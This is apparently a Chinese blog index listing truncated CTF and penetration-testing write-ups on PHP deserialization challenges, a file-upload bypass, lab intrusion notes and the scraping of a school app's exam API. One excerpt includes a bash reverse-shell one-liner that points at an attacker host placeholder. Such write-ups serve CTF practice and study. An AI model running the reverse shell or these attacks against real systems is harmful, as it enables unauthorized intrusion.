学校宥马运动题库爬取
报文 POST /school/school/exam/library/getExamLibraryQuestionList HTTP/2 Host: hwy.328ym.com Systemtype: android Content-Type: application/x-www-form-urlencoded Content-Length: 85 Accept-Encoding: gz...
报文 POST /school/school/exam/library/getExamLibraryQuestionList HTTP/2 Host: hwy.328ym.com Systemtype: android Content-Type: application/x-www-form-urlencoded Content-Length: 85 Accept-Encoding: gz...
源代码 https://github.com/CTF-Archives/2024qwqsnxbs/blob/main/mysqlprobe.php 解析 这里代码化简 <?php error_reporting(0); class Mysql { public $debug = 1; public $database; public $hostname;...
源代码 <?php highlight_file(__FILE__); error_reporting(0); class AAA { public $aear; public $string; public function __construct($a) { $this->aear = $a; } functi...
命令执行(这里不知道为什么burp没成功) https://blog.csdn.net/acdcccc/article/details/132700902 getshell使用教程公开exploit flag1 上传fscan 192.168.0.2:3306 open 192.168.0.3:80 open 192.168.0.2:80 open 192.168.0.1:...
渗透测试1 打靶是的简单记录 flag是我拿到的时间顺序记录 flag2 访问admin跳转登录 账号密码 admin admin flag1 主页下面 文件上传的点 测试了几个上传的点都是不行 又过了一遍配置 添加运行的后缀 双写绕过即可 普通的马子就可以了,这个连接失败 flag4 <?php return [ 't...
easy serialize 源代码 <?php //flag is in /flag.php error_reporting(0); class baby{ public $var; public $var2; public $var3; public function learn($key){ echo file_get_con...
通过第三周流量分析题和题目给的源代码得到 best_admin so_hard_password 和主页存在文件包含rce漏洞 ‘ 和newstar 之前两道题目一模一样,一步的lfl+rce 和 linux 提权 这个靶机有点问题,哥斯拉不是很好用,我们反弹shell到 公网服务器上 bash -i >& /dev/tcp/攻击机IP/端口 0>&...
Unserialize Again 源题目内容 <?php highlight_file(__FILE__); error_reporting(0); class story{ private $user='admin'; public $pass; public $eating; public $God='false'; public ...
逃 <?php highlight_file(__FILE__); function waf($str){ return str_replace("bad","good",$str); } class GetFlag { public $key; public $cmd = "whoami"; public function __construct(...
POP Gadget 原题文件 <?php highlight_file(__FILE__); class Begin{ public $name; public function __destruct() { if(preg_match("/[a-zA-Z0-9]/",$this->name)){ echo...